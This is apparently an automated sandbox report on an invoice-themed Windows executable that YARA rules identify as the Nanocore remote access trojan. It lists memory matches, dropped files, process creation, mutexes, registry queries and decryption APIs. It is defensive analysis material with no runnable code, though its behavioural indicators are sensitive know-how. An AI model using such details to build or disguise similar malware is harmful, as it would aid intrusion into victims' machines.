Source: 0000000E.00000002.341081024.0000000002260000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000E.00000002.341081024.0000000002260000.00000004.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000000.339547057.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000010.00000000.339547057.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000F.00000002.344485087.0000000002540000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.344485087.0000000002540000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000F.00000002.344485087.0000000002540000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.340666322.00000000004F4000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000002.340666322.00000000004F4000.00000004.00000020.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000002.359590843.00000000038E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000010.00000002.359590843.00000000038E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000000.341018876.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000010.00000000.341018876.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.297135620.00000000030A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.297135620.00000000030A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000002.297135620.00000000030A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.340553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000002.340553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000E.00000002.340553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000002.359549562.00000000028EE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000002.358899493.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000010.00000002.358899493.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000002.358899493.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000002.359622615.000000000391A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.341299575.000000000376A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000000.293187290.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000000.293187290.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.341227508.000000000273E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000000.294042312.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000000.294042312.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000002.359413916.0000000002502000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000010.00000002.359413916.0000000002502000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: G2M8C76V_INV0ICE_RECEIPT.exe PID: 6964, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: G2M8C76V_INV0ICE_RECEIPT.exe PID: 6964, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: G2M8C76V_INV0ICE_RECEIPT.exe PID: 7092, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: G2M8C76V_INV0ICE_RECEIPT.exe PID: 7092, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: chmac.exe PID: 6288, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: chmac.exe PID: 6288, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: chmac.exe PID: 6556, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: chmac.exe PID: 6556, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: chmac.exe PID: 6760, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: chmac.exe PID: 6760, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: chmac.exe PID: 6820, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: chmac.exe PID: 6820, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 0_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,	0_2_00403225
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 13_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,	13_2_00403225
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 15_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,	15_2_00403225

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 0_2_0040604C	0_2_0040604C
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 0_2_00404772	0_2_00404772
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 3_1_0040A2A5	3_1_0040A2A5
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 13_2_0040604C	13_2_0040604C
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 13_2_00404772	13_2_00404772
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_0040A2A5	14_2_0040A2A5
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_04882FA8	14_2_04882FA8
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_048823A0	14_2_048823A0
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_04883850	14_2_04883850
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_0488238F	14_2_0488238F
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_0488306F	14_2_0488306F
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_1_0040A2A5	14_1_0040A2A5
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 15_2_0040604C	15_2_0040604C
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 15_2_00404772	15_2_00404772
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_2_0040A2A5	16_2_0040A2A5
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_2_02573850	16_2_02573850
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_2_025723A0	16_2_025723A0
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_2_02572FA8	16_2_02572FA8
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_2_0257306F	16_2_0257306F
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_1_0040A2A5	16_1_0040A2A5

Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: String function: 00401ED0 appears 92 times
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: String function: 004056B5 appears 32 times
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: String function: 004029E8 appears 48 times
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: String function: 0040569E appears 72 times

Source: G2M8C76V_INV0ICE_RECEIPT.exe, 00000000.00000003.285266172.0000000003496000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs G2M8C76V_INV0ICE_RECEIPT.exe
Source: G2M8C76V_INV0ICE_RECEIPT.exe, 00000000.00000003.284604763.000000000362F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs G2M8C76V_INV0ICE_RECEIPT.exe

Source: G2M8C76V_INV0ICE_RECEIPT.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: chmac.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

File read: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

Jump to behavior

Source: G2M8C76V_INV0ICE_RECEIPT.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe "C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe"
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process created: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe "C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\dihsw\chmac.exe "C:\Users\user\AppData\Roaming\dihsw\chmac.exe"
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process created: C:\Users\user\AppData\Roaming\dihsw\chmac.exe "C:\Users\user\AppData\Roaming\dihsw\chmac.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\dihsw\chmac.exe "C:\Users\user\AppData\Roaming\dihsw\chmac.exe"
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process created: C:\Users\user\AppData\Roaming\dihsw\chmac.exe "C:\Users\user\AppData\Roaming\dihsw\chmac.exe"
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process created: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe "C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process created: C:\Users\user\AppData\Roaming\dihsw\chmac.exe "C:\Users\user\AppData\Roaming\dihsw\chmac.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process created: C:\Users\user\AppData\Roaming\dihsw\chmac.exe "C:\Users\user\AppData\Roaming\dihsw\chmac.exe"	Jump to behavior

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

File created: C:\Users\user\AppData\Roaming\dihsw

Jump to behavior

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

File created: C:\Users\user\AppData\Local\Temp\nsyC82.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@9/12@19/2

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

Code function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,

0_2_00402012

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

Code function: 0_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404275

Source: 16.2.chmac.exe.2500000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 16.2.chmac.exe.2500000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.2.chmac.exe.4830000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.2.chmac.exe.4830000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{1f8684ca-0835-4252-89d1-4a2b1be1a69a}

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

Code function: 3_1_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,

3_1_00401489

Source: 14.2.chmac.exe.4830000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 14.2.chmac.exe.4830000.9.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 14.2.chmac.exe.4830000.9.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 16.2.chmac.exe.2500000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 16.2.chmac.exe.2500000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 16.2.chmac.exe.2500000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

